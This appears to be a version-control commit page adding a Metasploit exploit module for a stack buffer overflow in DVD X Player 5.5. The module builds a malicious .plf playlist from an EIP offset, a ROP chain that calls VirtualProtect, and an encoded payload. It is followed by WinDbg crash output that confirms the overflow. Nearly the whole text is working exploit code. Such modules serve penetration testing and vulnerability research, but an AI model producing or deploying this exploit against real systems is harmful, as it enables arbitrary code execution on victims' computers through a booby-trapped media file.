Add DVD X plf playlist buffer overflow
git-svn-id: file:///home/svn/framework3/trunk@13672 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
6de16f055a
commit
717b0eddee
|
@ -0,0 +1,154 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking #Normal/Great/Good/Poor
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "DVD X Player 5.5 .plf PlayList Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
|
||||
Standard. By supplying a long string of data in a plf file (playlist), the
|
||||
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
|
||||
and then copy it on the stack without any proper bounds checking, which casues a
|
||||
buffer overflow, and results arbitrary code execution under the context of the user.
|
||||
|
||||
This module has been designed to target common Windows systems such as:
|
||||
Windows XP SP2/SP3, Windows Vista, and Windows 7.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => "$Revision$",
|
||||
'Author' =>
|
||||
[
|
||||
'D3r K0n!G', #Proof-of-concept
|
||||
'sickness', #ROP
|
||||
'sinn3r', #Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.exploit-db.com/exploits/17745'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00\x0a\x0d\x1a",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "seh", #none/process/seh
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'DVD X Player 5.5 Standard / Pro',
|
||||
{
|
||||
'Offset' => 260, #To EIP
|
||||
'Ret' => 0x61626702, #POP EAX; RET [EPG.dll]
|
||||
'Max' => 2000, #Max buffer size
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Aug 30 2011",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [false, 'The file name', 'msf.plf'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
rop = [
|
||||
0x10011108, #VirtualProtect IAT [SkinScrollBar.dll]
|
||||
0x616306ed, #MOV EAX, DWORD PTR DS:[EAX]; RET [EPG.dll]
|
||||
0x616385d8, #XCHG EAX,ESI; RETN 0 [EPG.dll]
|
||||
0x6162d202, #POP EBP; RET [EPG.dll]
|
||||
0x6160cac8, #PUSH ESP [EGP.dll]
|
||||
0x61626702, #POP EAX; RET [EGP.dll]
|
||||
0xfffffaff, #Value to negate, will become 0x00000501
|
||||
0x61627d9c, #NEG EAX; RET [epg.dll]
|
||||
0x61640124, #XCHG EAX,EBX; RET [EPG.dll]
|
||||
0x61626702, #POP EAX; RET [EPG.dll]
|
||||
0xffffffc0, #Value to negate, will become 0x00000040
|
||||
0x61627d9c, #NEG EAX; RET [EPG.dll]
|
||||
0x61608ba2, #XCHG EAX,EDX; RET [EPG.dll]
|
||||
0x6160b804, #POP ECX; RET [EPG.dll]
|
||||
0x6164b001, #Writable location [EPG.dll]
|
||||
0x6162e587, #POP EDI; RET [EPG.dll]
|
||||
0x6163081d, #ROP NOP [EPG.dll]
|
||||
0x61626702, #POP EAX; RET [EPG.dll]
|
||||
0x90909090,
|
||||
0x61620831, #PUSHAD; RET [EPG.dll]
|
||||
].pack('V*')
|
||||
|
||||
buf = ''
|
||||
buf << rand_text_alpha(target['Offset'])
|
||||
buf << [target.ret].pack('V')
|
||||
buf << rand_text_alpha(16)
|
||||
buf << rop
|
||||
buf << make_nops(15)
|
||||
buf << payload.encoded
|
||||
buf << rand_text_alpha(target['Max']-buf.length)
|
||||
|
||||
print_status("Creating #{datastore['FILENAME']}...")
|
||||
file_create(buf)
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
6400cd42 ffd3 call ebx {SHLWAPI!PathFindFileNameA (77f6c19c)}
|
||||
0:000> p
|
||||
eax=0406a15c ebx=77f6c19c ecx=00001300 edx=040600d0 esi=00000001 edi=6405362c
|
||||
eip=6400cd44 esp=0012f488 ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
|
||||
MediaPlayerCtrl+0xcd44:
|
||||
6400cd44 8b8dec000000 mov ecx,dword ptr <Unloaded_ionInfo.dll>+0xeb (000000ec)[ebp] ss:0023:00eafdcc=040600d0
|
||||
0:000> dd eax
|
||||
0406a15c 41414141 41414141 41414141 41414141
|
||||
0406a16c 41414141 41414141 41414141 41414141
|
||||
0406a17c 41414141 41414141 41414141 41414141
|
||||
0406a18c 41414141 41414141 41414141 41414141
|
||||
0406a19c 41414141 41414141 41414141 41414141
|
||||
0406a1ac 41414141 41414141 41414141 41414141
|
||||
0406a1bc 41414141 41414141 41414141 41414141
|
||||
0406a1cc 41414141 41414141 41414141 41414141
|
||||
0:000> g
|
||||
Breakpoint 2 hit
|
||||
eax=0406a15c ebx=77f6c19c ecx=040600d0 edx=040600d0 esi=00000001 edi=6405362c
|
||||
eip=6400cd4e esp=0012f47c ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
|
||||
MediaPlayerCtrl+0xcd4e:
|
||||
6400cd4e ff17 call dword ptr [edi] ds:0023:6405362c=6400d890
|
||||
0:000> g
|
||||
(464.c0c): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=00001389 ebx=040600d0 ecx=00000177 edx=0406a15c esi=0406af08 edi=00130000
|
||||
eip=6400dd50 esp=0012f234 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
|
||||
MediaPlayerCtrl!DllCreateObject+0x220:
|
||||
6400dd50 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
||||
0:000> !address 6400dd50
|
||||
64000000 : 64001000 - 0004e000
|
||||
Type 01000000 MEM_IMAGE
|
||||
Protect 00000020 PAGE_EXECUTE_READ
|
||||
State 00001000 MEM_COMMIT
|
||||
Usage RegionUsageImage
|
||||
FullPath C:\Program Files\Aviosoft\DVD X Player 5.5 Standard\MediaPlayerCtrl.dll
|
||||
=end
|
Loading…
Reference in New Issue